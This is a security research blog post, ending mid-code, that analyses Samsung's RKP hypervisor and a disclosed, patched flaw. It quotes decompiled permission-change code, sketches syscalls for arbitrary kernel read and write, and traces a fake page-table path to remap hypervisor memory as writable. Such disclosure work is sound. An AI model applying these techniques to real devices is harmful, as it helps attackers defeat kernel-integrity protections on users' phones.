Attacking Samsung RKP
Disclaimer

This work was done while we were working at Longterm Security and they have kindly allowed us to release the article on our company's blog.

This is a follow-up to our compendium blog post that presented the internals of Samsung's security hypervisor, including all the nitty-gritty details. This extensive knowledge is put to use in today's blog post that explains how we attacked Samsung RKP. After revealing three vulnerabilities leading to the compromise of the hypervisor or of its assurances, we also describe the exploitation paths we came up with. Finally, we take a look at the patches made by Samsung following our report.

In January 2021, we reported 3 vulnerabilities in Samsung's security hypervisor implementation. Each of the vulnerabilities has a different impact: from writing to hypervisor-enforced read-only memory, to compromising the hypervisor itself. The vulnerabilities were fixed in the June 2021 and October 2021 security updates. While they are specific to Samsung RKP, we think that they are good examples of what you should be keeping an eye out for if you're auditing a security hypervisor running on an ARMv8 device.

We will detail each of the vulnerabilities, explain how they can be exploited, and also take a look at their patch. While we recommend reading the original blog post, because it will make it easier to understand this one, we tried to summarize all the important bits in the introduction. Feel free to skip the introduction if you are already familiar with Samsung RKP.

Introduction

The main goal of a security hypervisor on a mobile device is to ensure kernel integrity at run time, so that even if an attacker has found a kernel vulnerability, they won't be able to modify sensitive kernel data structures, elevate privileges, or execute malicious code. In order to do that, the hypervisor executes at a higher privilege level (EL2) than the kernel (EL1), and it can take complete control over the kernel by making use of the virtualization extensions.

Virtualization Extensions

One of the features of the virtualization extensions is a second layer of address translation. When it is disabled, there is only one layer of address translation, which translates a Virtual Address (VA) directly into a Physical Address (PA). But when it is enabled, the first layer (stage 1 - under control of the kernel) now translates a VA into what is called an Intermediate Physical Address (IPA), and the second layer (stage 2 - under control of the hypervisor) translates this IPA into the real PA. This second layer has its own memory attributes, allowing the hypervisor to enforce memory permissions that differ from the ones in the kernel page tables, as well as to disable access to physical memory regions.

Another feature of the virtualization extensions, enabled by the use of the Hypervisor Configuration Register (HCR), allows the hypervisor to handle general exceptions and to trap critical operations usually handled by the kernel. Finally, in the cases where the kernel (EL1) needs to call into the hypervisor (EL2), it can do so by executing a HyperVisor Call (HVC) instruction. This is very similar to the SuperVisor Call (SVC) instruction that is used by userland processes (EL0) to call into the kernel (EL1).
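
To make this a little more concrete, here is a minimal sketch of what such a call can look like from EL1. The register convention shown below (x0 holding the application identifier, x1 the command, x2-x5 the arguments, followed by hvc #0) mirrors what the kernel's uh_call wrapper does and should be treated as an assumption of this sketch, not as something mandated by the architecture.

static inline void hyp_call(unsigned long app_id, unsigned long cmd,
                            unsigned long arg0, unsigned long arg1,
                            unsigned long arg2, unsigned long arg3) {
  register unsigned long x0 asm("x0") = app_id; /* e.g. the RKP application identifier */
  register unsigned long x1 asm("x1") = cmd;    /* command handled by the hypervisor   */
  register unsigned long x2 asm("x2") = arg0;
  register unsigned long x3 asm("x3") = arg1;
  register unsigned long x4 asm("x4") = arg2;
  register unsigned long x5 asm("x5") = arg3;

  /* HVC traps to EL2, exactly like SVC traps from EL0 to EL1 */
  asm volatile("hvc #0"
               : "+r"(x0)
               : "r"(x1), "r"(x2), "r"(x3), "r"(x4), "r"(x5)
               : "memory");
}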

Samsung RKP Assurances

Samsung's implementation of a security hypervisor enforces that:

  • the page tables cannot be modified directly by the kernel;
    • accesses to virtual memory system registers at EL1 are trapped;
    • page tables are set as read-only in the stage 2 address translation;
      • except for level 3 tables, but in that case the PXNTable bit is set;
  • double mappings are prevented (but the checking is only done by the kernel);
    • still, we can't make the kernel text read-write or a new region executable;
  • sensitive kernel global variables are moved in the .rodata region (read-only);
  • sensitive kernel data structures (cred, task_security_struct, vfsmount) are allocated on read-only pages;
    • on various operations, the credentials of a running task are checked:
      • a task that is not system cannot suddenly become system or root;
      • it is possible to set the cred field of a task_struct in an exploit;
      • but the next operation, like executing a shell, will trigger a violation;
    • credentials are also reference-counted to prevent their reuse by another task;
  • it is not possible to execute a binary as root from outside of specific mount points;
  • on Snapdragon devices, ROPP (ROP prevention) is also enabled by RKP.

Samsung RKP Implementation

Samsung RKP makes extensive use of two utility structures: memlists and sparsemaps.

  • A memlist is a list of address ranges (sort of a specialized version of std::vector; see the sketch below).
  • A sparsemap associates values to addresses (sort of a specialized version of std::map).
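
For reference, here is a rough sketch of what a memlist and its entries look like. The field names and offsets are approximations inferred from the memlist_init, memlist_reserve, and memlist_contains_addr code quoted later in this post; the sparsemap layout is not reproduced here.

#include <stdint.h>

/* Approximate layout, inferred from the decompiled code quoted later in this post. */
typedef struct memlist_entry {
  uint64_t addr;      /* base address of the range                 */
  uint64_t size;      /* size of the range (at offset 8)           */
  uint64_t unkn_10;
  uint64_t extra;
} memlist_entry_t;    /* 0x20 bytes per entry, cf. memlist_reserve */

typedef struct memlist {
  memlist_entry_t* base;  /* backing array, allocated on the "static heap" */
  uint32_t capacity;      /* number of allocated slots (5 by default)      */
  uint32_t count;         /* number of entries in use                      */
  uint32_t merged;
  uint32_t unkn_14;
  /* crit_sec_t cs;          critical section protecting the list          */
} memlist_t;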

There are multiple instances of these control structures, listed below by order of initialization:

  • the memlist dynamic_regions contains the DRAM regions (sent by S-Boot);
  • the memlist protected_ranges contains critical hypervisor SRAM/DRAM regions;
  • the sparsemap physmap associates a type (kernel text, PT, etc.) to each DRAM page;
  • the sparsemap ro_bitmap indicates if a DRAM page is read-only in the stage 2;
  • the sparsemap dbl_bitmap is used by the kernel to detect double-mapped DRAM pages;
  • the memlist page_allocator.list contains the DRAM region used by RKP's page allocator;
  • the sparsemap page_allocator.map tracks DRAM pages allocated by RKP's page allocator;
  • the memlist executable_regions contains the kernel's executable pages;
  • the memlist dynamic_load_regions is used by the "dynamic load" feature.

Please note that these control structures are used by the hypervisor for keeping track of what is in memory and how it is mapped. But they have no direct impact on the actual address translation (unlike the stage 2 page tables). The hypervisor has to carefully keep in sync the control structures and page tables to avoid issues.

The hypervisor has multiple allocators, each serving a different purpose:

  • the "static heap" contains SRAM memory (before initialization) and also DRAM memory (after initialization);
    • It is used for the EL2 page tables, for the memlists and for the PA's descriptors;
  • the "dynamic heap" contains only DRAM memory (and the PA's memory region is carved out of it);
    • It is used for the EL1 stage 2 page tables and for the sparsemaps (entries and bitmaps);
  • the "page allocator" (PA) contains only DRAM memory;
    • It is used for allocating the EL1 stage 1 page tables and for the pages of protected SLUB caches.

Samsung RKP Initialization

The initialization of the hypervisor (alongside the kernel) is detailed in the first blog post. When looking for vulnerabilities, it is crucial to know what the state of the various control structures is at a given moment, as well as what the page tables for the stage 2 at EL1 and stage 1 at EL2 contain. The hypervisor state after initialization is reported below.

The control structures are as follows:

  • The protected_ranges contains the hypervisor code/data and the memory backing the physmap.
  • In the physmap,
    • the kernel .text segment is marked as TEXT;
    • user PGDs, PMDs, and PTEs are marked as L1, L2, L3 respectively;
    • kernel PGDs, PMDs, and PTEs are marked as KERNEL|L1, KERNEL|L2, KERNEL|L3 respectively.
  • The ro_bitmap contains the kernel .text and .rodata segments, and other pages that have been made read-only in the stage 2 (like the L1, L2, and some of the L3 kernel page tables).
  • The executable_regions contains the kernel .text segment and trampoline page.

In the page tables of EL2 stage 1 (controlling what the hypervisor can access):

  • the hypervisor segments are mapped (from the initial PTs);
  • the log and "bigdata" regions are mapped as RW;
  • the kernel .text segment is mapped as RO;
  • the first page of swapper_pg_dir is mapped as RW.

In the page tables of EL1 stage 2 (controlling what the kernel can really access):

  • the hypervisor memory region is unmapped;
  • empty_zero_page is mapped as RWX;
  • the log region is mapped as ROX;
  • the region backing the "dynamic heap" is mapped as ROX;
  • PGDs are mapped as RO:
    • the PXN bit is set on block descriptors;
    • the PXN bit is set on table descriptors but only for user PGDs.
  • PMDs are mapped as RO:
    • the PXN bit is set on descriptor for VAs not in the executable_regions.
  • PTEs are mapped as RO for VAs in the executable_regions.
  • the kernel .text segment is mapped as ROX.

Our Research Device

Our test device during this research was a Samsung A51 (SM-A515F). Instead of using a full exploit chain, we downloaded the kernel source code from Samsung's Open Source website, added a few syscalls, recompiled the kernel, and flashed it onto the device.

The new syscalls make it really convenient to interact with RKP and allow us from userland to:

  • read kernel memory;
  • write kernel memory;
  • allocate kernel memory;
  • free kernel memory;
  • make a hypervisor call (using the uh_call function; see the sketch below).
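
As a rough illustration, these additions boil down to thin wrappers like the ones sketched below. The syscall names and the exact uh_call prototype are assumptions on our part, not code taken from Samsung's sources.

#include <linux/syscalls.h>
#include <linux/types.h>
#include <linux/slab.h>
#include <linux/uaccess.h>

/* implemented by Samsung's uh driver; it ends up executing an HVC (prototype assumed) */
extern void uh_call(u64 app_id, u64 cmd, u64 arg0, u64 arg1, u64 arg2, u64 arg3);

SYSCALL_DEFINE2(kread64, unsigned long, addr, unsigned long __user *, out) {
  unsigned long val = *(volatile unsigned long *)addr;  /* arbitrary kernel read */
  return put_user(val, out);
}

SYSCALL_DEFINE2(kwrite64, unsigned long, addr, unsigned long, val) {
  *(volatile unsigned long *)addr = val;                /* arbitrary kernel write */
  return 0;
}

SYSCALL_DEFINE1(kalloc, unsigned long, size) {
  return (long)kmalloc(size, GFP_KERNEL);               /* returns a kernel VA */
}

SYSCALL_DEFINE1(kfree_va, unsigned long, addr) {
  kfree((void *)addr);                                  /* frees a kernel allocation */
  return 0;
}

SYSCALL_DEFINE6(hypcall, unsigned long, app, unsigned long, cmd, unsigned long, a0,
                unsigned long, a1, unsigned long, a2, unsigned long, a3) {
  uh_call(app, cmd, a0, a1, a2, a3);                    /* HVC into the hypervisor */
  return 0;
}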

Remapping RKP memory as writable from EL1

SVE-2021-20178 (CVE-2021-25415): Possible remapping RKP memory as writable from EL1

Severity: High
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 4, 2021
Disclosure status: Privately disclosed.
Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to remap EL2 memory as writable.
The patch adds the proper address validation in RKP to prevent change of EL2 memory attribution from EL1.

Vulnerability

When RKP needs to change the permissions of a memory region in the stage 2, it uses either rkp_s2_page_change_permission, which operates on a single page, or rkp_s2_range_change_permission, which operates on an address range. These functions can be abused to remap hypervisor memory (that was unmapped during initialization) as writable from the kernel, allowing us to fully compromise the security hypervisor. Let's see how and why we can do that.

int64_t rkp_s2_page_change_permission(void* p_addr, uint64_t access, uint32_t exec, uint32_t allow) {
  // ...

  if (!allow && !rkp_inited) {
    uh_log('L', "rkp_paging.c", 574, "s2 page change access not allowed before init %d", allow);
    rkp_policy_violation("s2 page change access not allowed, p_addr : %p", p_addr);
    return -1;
  }
  if (is_phys_map_s2unmap(p_addr)) {
    rkp_policy_violation("Error page was s2 unmapped before %p", p_addr);
    return -1;
  }
  if (page_allocator_is_allocated(p_addr) == 1) {
    return 0;
  }
  if (p_addr >= TEXT_PA && p_addr < ETEXT_PA) {
    return 0;
  }
  if (p_addr >= rkp_get_pa(SRODATA) && p_addr < rkp_get_pa(ERODATA)) {
    return 0;
  }
  uh_log('L', "rkp_paging.c", 270, "Page access change out of static RO range %lx %lx %lx", p_addr, access, exec);
  if (access == 0x80) {
    ++page_ro;
    attrs = UNKN1 | READ;
  } else {
    ++page_free;
    attrs = UNKN1 | WRITE | READ;
  }
  if (p_addr == ZERO_PG_ADDR || exec) {
    attrs |= EXEC;
  }
  if (map_s2_page(p_addr, p_addr, 0x1000, attrs) < 0) {
    rkp_policy_violation("map_s2_page failed, p_addr : %p, attrs : %d", p_addr, attrs);
    return -1;
  }
  tlbivaae1is(((p_addr + 0x80000000) | 0xffffffc000000000) >> 12);
  return rkp_set_pgt_bitmap(p_addr, access);
}

rkp_s2_page_change_permission does some checking on its arguments:

  • if allow == 0, then RKP must be initialized;
  • the page must not be marked S2UNMAP in the physmap;
  • it must not belong to the hypervisor page allocator (robuf sparsemap);
  • it must not be in the kernel .text or .rodata segments.

After that it determines the memory attributes to apply to the page based on the arguments, calls map_s2_page that effectively modifies the stage 2 page tables, flushes the TLBs and marks the page as read-only or not in the ro_bitmap.

int64_t rkp_s2_range_change_permission(uint64_t start_addr,
                                       uint64_t end_addr,
                                       uint64_t access,
                                       uint32_t exec,
                                       uint32_t allow) {
  // ...

  uh_log('L', "rkp_paging.c", 195, "RKP_4acbd6db%lxRKP_00950f15%lx", start_addr, end_addr);
  if (!allow && !rkp_inited) {
    uh_log('L', "rkp_paging.c", 593, "s2 range change access not allowed before init");
    rkp_policy_violation("Range change permission prohibited");
  } else if (allow != 2 && rkp_deferred_inited) {
    uh_log('L', "rkp_paging.c", 603, "s2 change access not allowed after def-init");
    rkp_policy_violation("Range change permission prohibited");
  }
  if (((start_addr | end_addr) & 0xfff) != 0) {
    uh_log('L', "rkp_paging.c", 203, "start or end addr is not aligned, %p - %p", start_addr, end_addr);
    return -1;
  }
  if (start_addr > end_addr) {
    uh_log('L', "rkp_paging.c", 208, "start addr is bigger than end addr %p, %p", start_addr, end_addr);
    return -1;
  }
  size = end_addr - start_addr;
  if (access == 0x80) {
    attrs = UNKN1 | READ;
  } else {
    attrs = UNKN1 | WRITE | READ;
  }
  if (exec) {
    attrs |= EXEC;
  }
  p_addr_start = start_addr;
  if (s2_map(start_addr, end_addr - start_addr, attrs, &p_addr_start) < 0) {
    uh_log('L', "rkp_paging.c", 222, "s2_map returned false, p_addr_start : %p, size : %p", p_start_addr, size);
    return -1;
  }
  if (start_addr == end_addr) {
    return 0;
  }
  addr = start_addr;
  do {
    res = rkp_set_pgt_bitmap(addr, access);
    if (res < 0) {
      uh_log('L', "rkp_paging.c", 229, "set_pgt_bitmap fail, %p", addr);
      return res;
    }
    tlbivaae1is(((addr + 0x80000000) | 0xffffffc000000000) >> 12);
    addr += 0x1000;
  } while (addr < end_addr);
  return 0;
}

rkp_s2_range_change_permission also does some checking on its arguments:

  • if allow == 0, then RKP must be initialized;
  • if allow != 2, then RKP must not be deferred initialized;
  • start_addr and end_addr must be page-aligned;
  • start_addr must be lower than end_addr.

After that it also determines the memory attributes to apply to the page based on the arguments, calls s2_map that effectively modifies the stage 2 page tables, marks the pages as read-only or not in the ro_bitmap, and flushes the TLBs.

int64_t s2_map(uint64_t orig_addr, uint64_t orig_size, attrs_t attrs, uint64_t* paddr) {
  // ...

  if (!paddr) {
    return -1;
  }
  addr = orig_addr - (orig_addr & 0xfff);
  size = (orig_addr & 0xfff) + orig_size;
  if (!size) {
    return 0;
  }
  while (size > 0x1fffff && (addr & 0x1fffff) == 0) {
    if (map_s2_page(*paddr, addr, 0x200000, attrs)) {
      uh_log('L', "s2.c", 1132, "unable to map 2mb s2 page: %p", addr);
      return -1;
    }
    size -= 0x200000;
    addr += 0x200000;
    *paddr += 0x200000;
    if (!size) {
      return 0;
    }
  }
  while (size > 0xfff && (addr & 0xfff) == 0) {
    if (map_s2_page(*paddr, addr, 0x1000, attrs)) {
      uh_log('L', "s2.c", 1150, "unable to map 4kb s2 page: %p", addr);
      return -1;
    }
    size -= 0x1000;
    addr += 0x1000;
    *paddr += 0x1000;
    if (!size) {
      return 0;
    }
  }
  return 0;
}

s2_map is a wrapper around map_s2_page that takes into account the various page/block sizes that make up the memory range given as argument. map_s2_page directly operates on the page tables and does not care about anything else (in particular, the control structures).

You might have already noticed that rkp_s2_range_change_permission doesn't do as many checks as rkp_s2_page_change_permission. In particular, it doesn't ensure that the pages of the memory range are not marked S2UNMAP in the physmap. So if we give it a memory range inside hypervisor memory, it will happily remap it in the stage 2.

But the check of the physmap in rkp_s2_page_change_permission doesn't even matter. One would expect a page to be marked S2UNMAP in the physmap when it is actually unmapped from the stage 2. Below is the code of s2_unmap that does the unmapping:

int64_t s2_unmap(uint64_t orig_addr, uint64_t orig_size) {
  // ...

  addr = orig_addr & 0xfffffffffffff000;
  size = (orig_addr & 0xfff) + orig_size;
  if (!size) {
    return 0;
  }
  while (size > 0x3fffffff && (addr & 0x3fffffff) == 0) {
    if (unmap_s2_page(addr, 0x40000000)) {
      uh_log('L', "s2.c", 1175, "unable to unmap 1gb s2 page: %p", addr);
      return -1;
    }
    size -= 0x40000000;
    addr += 0x40000000;
    if (!size) {
      return 0;
    }
  }
  while (size > 0x1fffff && (addr & 0x1fffff) == 0) {
    if (unmap_s2_page(addr, 0x200000)) {
      uh_log('L', "s2.c", 1183, "unable to unmap 2mb s2 page: %p", addr);
      return -1;
    }
    size -= 0x200000;
    addr += 0x200000;
    if (!size) {
      return 0;
    }
  }
  while (size > 0xfff && (addr & 0xfff) == 0) {
    if (unmap_s2_page(addr, 0x1000)) {
      uh_log('L', "s2.c", 1191, "unable to unmap 4kb s2 page: %p", addr);
      return -1;
    }
    size -= 0x1000;
    addr += 0x1000;
    if (!size) {
      return 0;
    }
  }
  return 0;
}

s2_unmap, similarly to s2_map, is a wrapper around unmap_s2_page. It turns out there really are no calls to rkp_phys_map_set, rkp_phys_map_set_region, or even the low level sparsemap_set_value_addr, that ever mark a page as S2UNMAP. So we can even use rkp_s2_page_change_permission to remap hypervisor memory.

Exploitation

To exploit this two-fold bug, we need to look for calls to the rkp_s2_page_change_permission and rkp_s2_range_change_permission functions, that can be triggered from the kernel after the hypervisor has been initialized, and with controllable arguments.

Exploring Our Options

rkp_s2_page_change_permission is called:

  • in rkp_l1pgt_process_table
  • in rkp_l2pgt_process_table
  • in rkp_l3pgt_process_table
  • in set_range_to_pxn_l3
  • in set_range_to_rox_l3
  • in rkp_set_pages_ro
  • in rkp_ro_free_pages

And rkp_s2_range_change_permission is called:

  • in many dynamic_load_xxx functions

rkp_lxpgt_process_table

We have taken a closer look at the functions rkp_l1pgt_process_table, rkp_l2pgt_process_table and rkp_l3pgt_process_table in the first blog post. It seems fairly easy to reach the call to rkp_s2_page_change_permission in these functions, assuming that we control their first argument.

If the third argument is_alloc == 1, then the page needs to not be marked as LX in the physmap, and as a result it will be set as read-only in the stage 2 and marked as LX in the physmap. If the third argument is_alloc == 0, then the page needs to be marked as LX in the physmap, and as a result it will be set as read-write in the stage 2 and marked as FREE in the physmap. So by calling the function twice, once with is_alloc == 1 and once with is_alloc == 0, we should be able to call rkp_s2_page_change_permission with the read-write permissions (and then write to hypervisor memory directly from the kernel).

The next question is: can we call the rkp_lxpgt_process_table functions with controlled arguments?

rkp_l1pgt_process_table is called:

  • in rkp_l1pgt_new_pgd
  • in rkp_l1pgt_free_pgd
  • in rkp_l1pgt_ttbr

Let's start with rkp_l1pgt_ttbr:

int64_t rkp_l1pgt_ttbr(uint64_t ttbr, uint32_t user_or_kernel) {
  // ...

  pgd = ttbr & 0xfffffffff000;
  if (!rkp_deferred_inited) {
    should_process = 0;
  } else {
    should_process = 1;
    if (user_or_kernel == 0x1ffffff || pgd != ZERO_PG_ADDR) {
      if (!rkp_inited) {
        should_process = 0;
      }
      if (pgd == INIT_MM_PGD) {
        should_process = 0;
      }
      if (pgd == TRAMP_PGD && TRAMP_PGD) {
        should_process = 0;
      }
    } else {
      if ((get_sctlr_el1() & 1) != 0 || !rkp_inited) {
        should_process = 0;
      }
    }
  }
  if (should_process && rkp_l1pgt_process_table(pgd, user_or_kernel, 1) < 0) {
    return rkp_policy_violation("Process l1t returned false, l1e addr : %lx", pgd);
  }
  if (!user_or_kernel) {
    return set_ttbr0_el1(ttbr);
  } else {
    return set_ttbr1_el1(ttbr);
  }
}

ttbr and user_or_kernel are user-controlled, rkp_deferred_inited == 1, rkp_inited == 1, the MMU is enabled, so if either:

  • user_or_kernel == 0 and pgd != ZERO_PG_ADDR && pgd != INIT_MM_PGD && pgd != TRAMP_PGD
  • user_or_kernel == 0x1FFFFFF and pgd != INIT_MM_PGD && pgd != TRAMP_PGD

then we should have should_process == 1 and rkp_l1pgt_process_table will be called. But it will also either set the system register TTBR0_EL1 or TTBR1_EL1, and we don't control the is_alloc argument, so it is not an optimal path. Let's take a look at the others.

We have already seen the functions rkp_l1pgt_new_pgd and rkp_l1pgt_free_pgd in the first blog post. They are very good candidates, but there is one drawback to using them. The value given to rkp_l1pgt_process_table comes from a call to rkp_get_pa, which itself calls check_kernel_input, a function that checks if the physical address is in the protected_ranges memlist. So we can't give it a hypervisor address directly. Instead, what we need to do is reach the processing of the next level, so that the value given to rkp_l2pgt_process_table comes from a descriptor's output address and not from a call to rkp_get_pa.

rkp_l2pgt_process_table is called:

  • in rkp_l1pgt_process_table
  • in rkp_l1pgt_write

And rkp_l3pgt_process_table is called:

  • in check_single_l2e (called from rkp_l2pgt_process_table and rkp_l2pgt_write)

Finally, we have also seen the functions rkp_l1pgt_write and rkp_l2pgt_write in the first blog post. They too are very good candidates: they allow calling rkp_l2pgt_process_table and rkp_l3pgt_process_table by writing a fake level 1 or level 2 descriptor, respectively, into the kernel page tables.

For the sake of completeness, we will take a look at our other options, even if we already have a good path to exploit the vulnerability.

set_range_to_xxx_l3

set_range_to_pxn_l3 is called all the way from rkp_set_range_to_pxn:

int64_t rkp_set_range_to_pxn(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  res = set_range_to_pxn_l1(table, start_addr, end_addr);
  if (res) {
    uh_log('W', "rkp_l1pgt.c", 186, "Fail to change attribute to pxn");
    return res;
  }
  size = end_addr - start_addr;
  invalidate_s1_el1_tlb_region(start_addr, size);
  paddr = rkp_get_pa(start_addr);
  invalidate_instruction_cache_region(paddr, size);
  return 0;
}
int64_t set_range_to_pxn_l1(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  if (is_phys_map_kernel(table) && is_phys_map_l1(table)) {
    next_start_addr = start_addr;
    res = 0;
    do {
      next_end_addr = (next_start_addr & 0xffffffffc0000000) + 0x40000000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc = *(table + 8 * ((next_start_addr >> 30) & 0x1ff));
      if ((table_desc & 3) == 3) {
        res += set_range_to_pxn_l2(table_desc & 0xfffffffff000, next_start_addr, next_end_addr);
      }
      next_start_addr = next_end_addr;
    } while (next_start_addr < end_addr);
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}
int64_t set_range_to_pxn_l2(uint64_t table, uint64_t start_addr, int64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  if (is_phys_map_kernel(table) && is_phys_map_l2(table)) {
    next_start_addr = start_addr;
    res = 0;
    do {
      next_end_addr = (next_start_addr & 0xffffffffffe00000) + 0x200000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc_p = table + 8 * ((next_start_addr >> 21) & 0x1ff);
      if ((*table_desc_p & 3) == 3) {
        if (!executable_regions_contains(*table_desc_p)) {
          set_pxn_bit_of_desc(table_desc_p, 2);
        }
        res += set_range_to_pxn_l3(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
      } else if (*table_desc_p && !executable_regions_contains(*table_desc_p)) {
        set_pxn_bit_of_desc(table_desc_p, 2);
      }
      next_start_addr = next_end_addr;
    } while (next_start_addr < end_addr);
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}
int64_t set_range_to_pxn_l3(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  if (is_phys_map_kernel(table) && is_phys_map_l3(table)) {
    res = rkp_s2_page_change_permission(table, 0, 0, 0);
    if (res < 0) {
      uh_log('L', "rkp_l3pgt.c", 153, "pxn l3t failed, %lx", table);
      rkp_phys_map_unlock(table);
      return res;
    }
    res = rkp_phys_map_set(table, FREE);
    if (res < 0) {
      rkp_phys_map_unlock(table);
      return res;
    }
  }
  next_start_addr = start_addr;
  do {
    next_end_addr = (next_start_addr + 0x1000) & 0xfffffffffffff000;
    if (next_end_addr > end_addr) {
      next_end_addr = end_addr;
    }
    table_desc_p = table + 8 * ((next_start_addr >> 12) & 0x1ff);
    if ((*table_desc_p & 3) == 3 && !executable_regions_contains(*table_desc_p, 3)) {
      set_pxn_bit_of_desc(table_desc_p, 3);
    }
    next_start_addr = next_end_addr;
  } while (next_start_addr < end_addr);
  rkp_phys_map_unlock(table);
  return 0;
}

rkp_set_range_to_pxn is always called with INIT_MM_PGD (swapper_pg_dir) as its first argument. It will walk the kernel page tables (stage 1) and set the PXN bit of the pages and blocks spanning over the specified address range. The call to rkp_s2_page_change_permission only happens for level 3 tables that are marked KERNEL|L3 in the physmap.

It is not the best option for many reasons: our target page of hypervisor memory would need to be marked KERNEL|L3 in the physmap, it requires having already written a user-controlled descriptor into the kernel page tables (bringing us back to the rkp_lxpgt_process_table functions that we have seen above), and the "dynamic load" feature is only available on Exynos devices, as we are going to see with the next vulnerability.

set_range_to_rox_l3 is called all the way from rkp_set_range_to_rox:

int64_t rkp_set_range_to_rox(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  res = set_range_to_rox_l1(table, start_addr, end_addr);
  if (res) {
    uh_log('W', "rkp_l1pgt.c", 199, "Fail to change attribute to rox");
    return res;
  }
  size = end_addr - start_addr;
  invalidate_s1_el1_tlb_region(start_addr, size);
  paddr = rkp_get_pa(start_addr);
  invalidate_instruction_cache_region(paddr, size);
  return 0;
}
int64_t set_range_to_rox_l1(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  if (table != INIT_MM_PGD) {
    rkp_policy_violation("rox only allowed on kerenl PGD! l1t : %lx", table);
    return -1;
  }
  rkp_phys_map_lock(table);
  if (is_phys_map_kernel(table) && is_phys_map_l1(table)) {
    next_start_addr = start_addr;
    res = 0;
    do {
      next_end_addr = (next_start_addr & 0xffffffffc0000000) + 0x40000000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc_p = table + 8 * ((next_start_addr >> 30) & 0x1ff);
      if ((*table_desc_p & 3) == 3) {
        set_rox_bits_of_desc(table_desc_p, 1);
        res += set_range_to_rox_l2(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
      } else if (*table_desc_p) {
        set_rox_bits_of_desc(table_desc_p, 1);
      }
      next_start_addr = next_end_addr;
    } while (next_start_addr < end_addr);
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}
int64_t set_range_to_rox_l2(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  if (is_phys_map_kernel(table) && is_phys_map_l2(table)) {
    next_start_addr = start_addr;
    do {
      next_end_addr = (next_start_addr & 0xffffffffffe00000) + 0x200000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc_p = table + 8 * ((next_start_addr >> 21) & 0x1ff);
      if ((*table_desc_p & 3) == 3) {
        set_rox_bits_of_desc(table_desc_p, 2);
        res += set_range_to_rox_l3(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
      } else if (*table_desc_p) {
        set_rox_bits_of_desc(table_desc_p, 2);
      }
      next_start_addr = next_end_addr;
    } while (next_start_addr < end_addr);
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}
int64_t set_range_to_rox_l3(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  if (!is_phys_map_kernel(table) || !is_phys_map_l3(table)) {
    res = rkp_s2_page_change_permission(table, 0x80, 0, 0);
    if (res < 0) {
      uh_log('L', "rkp_l3pgt.c", 193, "rox l3t failed, %lx", table);
      rkp_phys_map_unlock(table);
      return res;
    }
    res = rkp_phys_map_set(table, FLAG2 | KERNEL | L3);
    if (res < 0) {
      rkp_phys_map_unlock(table);
      return res;
    }
  }
  next_start_addr = start_addr;
  do {
    next_end_addr = (next_start_addr + 0x1000) & 0xfffffffffffff000;
    if (next_end_addr > end_addr) {
      next_end_addr = end_addr;
    }
    table_desc_p = table + 8 * ((next_start_addr >> 12) & 0x1ff);
    if ((*table_desc_p & 3) == 3) {
      set_rox_bits_of_desc(table_desc_p, 3);
    }
    next_start_addr = next_end_addr;
  } while (next_start_addr < end_addr);
  rkp_phys_map_unlock(table);
  return 0;
}

rkp_set_range_to_rox is also always called with INIT_MM_PGD (swapper_pg_dir) as its first argument. It will walk the kernel page tables (stage 1) and set the permission bits of the pages and blocks spanning over the specified address range to make them read-only. The call to rkp_s2_page_change_permission also only happens for level 3 tables, but this time for tables that are not marked KERNEL or L3 in the physmap.

It is not the best option either for similar reasons: the target page is set as read-only in the stage 2, it requires having already written a user-controlled descriptor into the kernel page tables, and the "dynamic load" feature is only present on Exynos devices.

The Remaining Options

The last two functions that call rkp_s2_page_change_permission are rkp_set_pages_ro and rkp_ro_free_pages. Unfortunately, they pass rkp_s2_page_change_permission an address that comes from a call to rkp_get_pa, so they are unusable for our exploit.

Finally, rkp_s2_range_change_permission is called from many dynamic_load_xxx functions, but as we have mentioned above, the "dynamic load" feature is only available on Exynos devices and we would like to keep the exploit as generic as possible.

Remapping Our Target Page

To exploit the vulnerability, we decided to use rkp_l1pgt_new_pgd and rkp_l1pgt_free_pgd. Since these functions call rkp_l1pgt_process_table with a physical address coming from rkp_get_pa, we will be targeting the rkp_s2_page_change_permission call in the rkp_l2pgt_process_table function instead. To reach this code, we can give as input to rkp_l1pgt_process_table a "fake PGD" that contains a single descriptor pointing to a "fake PMD" (our target hypervisor memory page).

The first step is to call rkp_cmd_new_pgd, which simply calls rkp_l1pgt_new_pgd.

rkp_l1pgt_new_pgd calls rkp_l1pgt_process_table, that will process our "fake PGD" located in kernel memory (high_bits is 0 and is_alloc is 1):

int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pgd);
  if (is_alloc) {
    if (is_phys_map_l1(pgd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    // ...
    res = rkp_phys_map_set(pgd, L1);
    // ...
    res = rkp_s2_page_change_permission(pgd, 0x80, 0, 0);
    // ...
  }
  // ...
  // for each descriptor:
  do {
    // ...
    if ((desc & 3) != 3) {
      if (desc) {
        set_pxn_bit_of_desc(desc_p, 1);
      }
    } else {
      addr = start_addr & 0xffffff803fffffff | offset;
